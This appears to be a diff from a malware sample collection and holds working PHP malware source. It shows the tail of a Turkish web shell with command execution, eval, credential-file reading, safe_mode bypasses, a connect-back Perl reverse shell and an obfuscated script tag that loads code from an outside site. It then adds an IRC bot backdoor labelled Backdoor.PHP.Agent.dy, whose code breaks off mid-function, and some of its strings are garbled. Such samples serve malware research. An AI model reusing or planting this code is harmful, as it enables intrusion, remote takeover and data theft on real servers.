} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {
if ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");
foreach ($units as $unit) {
$size = ($size / 1024);
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
input ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
print $sf."<textarea cols=157 rows=23 name=edittxt>";
$alltxt= file_get_contents($_REQUEST['edit']);
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
if (is_writable($_REQUEST['edit'])){
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
elseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
if (isset ($_REQUEST['safefile'])){
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){
$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;
\$system='$epath';
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
system(\$sys);system (\$system);
exit(0); }
");callfuncs("chmod 777 $backpl");
ob_start();
callfuncs("perl $backpl $bip $bport");
ob_clean();
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>
[ Or Go to a writable dir and then try to connect again ]<br>
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
print "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>".$st.$c1;
print "<center><div><b>Enter the command to execute";print $ec;
print $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td width=32%><div align=right>";print $st.$c1;
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Create-D","");print " ";
input("submit","deldir","Delete-D","");
print "</center>".$ef.$ec.$et."</div></td></tr>";
print "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","Göster","");print " ";
input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "&nbsp;<textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Execute');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=center>";
print $st.$c1."<div><b><center>Execute useful commands</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>
<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>
<option value='op11'>Perms in curr Dir</option>
<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>
<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
print $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
print "<b><font face=tahoma size=2>&nbsp;To </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>
<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Safe mode bypass :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Using copy() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("# Backdoor Baglantisi #");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Connect","");print " ";input("reset","","Reset","");
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>
<option value='up2121'>2121</option></select>";print " ";
input("text","uback","back.pl",23);print " ";
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Copyright is reserved to Ekin0x <br>[ By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]";
print"</font></td></tr></table>";
include ($a.$b.$c);
?>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0072\u006f\u006f\u006d\u002d\u0065\u0073\u0063\u0061\u0070\u0065\u002d\u0067\u0061\u006d\u0065\u0073\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>

628
PHP/Backdoor.PHP.Agent.dy Normal file
View File

@ -0,0 +1,628 @@
<?php
//fighter script - BAJAY
function working() {
$querym=array(
"?",
"!",
"^^",
" ^^",
" :(",
" :)",
" ~:>",
" :P~",
" :D",
",",
".",
"a",
"i",
"u",
"e",
"o",
"z",
"v",
"z",
"x",
"c",
"p",
"m",
"t",
"k",
"b",
"s",
"u",
"bot",
"g",
"lo",
"jo",
"lol"
);
$tsu1=array("`","|","[","]","{","}","^","_");
$tsu2=array("`","|","[","]","{","}","^","-","\\","_");
$nicky=array(
"cew_im0ed",
"cew_isepin",
"cew_maud",
"cew_like_ml",
"cew_butuh",
"cew_suka_dorong",
"cew_gerobak",
"cew_soto",
"cew_bakso",
"cew_gado",
"cew_burik",
"cew_panas",
"cew_tempat",
"cew_asbak",
"cew_jual_kambing",
"cew_utis_surya",
"cew_notepad",
"cew_spg_montok_abis",
"cew_diam_saja",
"cew_bantal",
"cew_udunen",
"cew_poraken",
"cew_suka_bawahmu",
"cew_kutilen",
"cew_bokong",
"cew_jujur",
"cew_urat_nadi",
"cew_butuh_kamu",
"cew_tentara",
"cew_monitor",
"cew_dodol_wedus",
"cew_burik_beceng",
"cew_blethang",
"cew_kerbuy",
"cew_brekay",
"cew_lesbong",
"cew_napi",
"cew_wlingi",
"cew_kauman",
"cew_pendaki",
"cew_lesoh",
"cew_cari_co_gede",
"cew_suka_ditimang",
"cew_binasa",
"cew_dandong^fs",
"cew_kepeten",
"cew_bisadiboking",
"cew_jalanjalan",
"cew_tawangmangu",
"cew_suka_kentut",
"cew_duh_burik"
);
$usr1=array(
"BLoodroSE",
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = "4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚»8!4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚« 4tawa 8CÃ<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ââ¬Å¡Ãƒâ€šÃ®Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ’� ’Ã<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ââ¬Å¡Ãƒâ€šÃ«wS 4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚»8!4Ã<C383>&#65533; Ã<E28099> ’Æââ¬â„¢Ãƒ<C383>&#65533; ââââ¬Å¡Ã¬Ã…áÃ<C383>&#65533; Ã<E28099> ’‚Ã<C383>&#65533; ’‚«";
$identify = 'serang';
$Admin = 'paijoe';
$BOT_PASSWORD = 'serang';
$channels = '#xirc';
$remotehst2= array("irc.mojok.org","irc.indoirc.net");
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '6667';
$realname = '8,1^_1,13B13,1L1,13o13,1o1,13D13,1S8,1_^';
$counterfp = 0;
$channels = str_replace("CNL","#",$channels);
print "<body bgcolor=#000000 text=#C0C0C0>";
print "<b>== Connecting to $remotehost...</b>";
$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6666"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
set_time_limit(0);
define ('CRL', "\r\n");
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print "<br><b>== Suceeded connection</b>";
$Header = 'NICK '.$nick . CRL;
$Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $Header);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
}
$pong1 = '1';
}
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :You`re Authorized as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password bener bos seep! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass salah cux! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION iLhaMiRc ajaH:p'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :You`re Authorized as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :password salah! Auth salah cok! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' siap bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
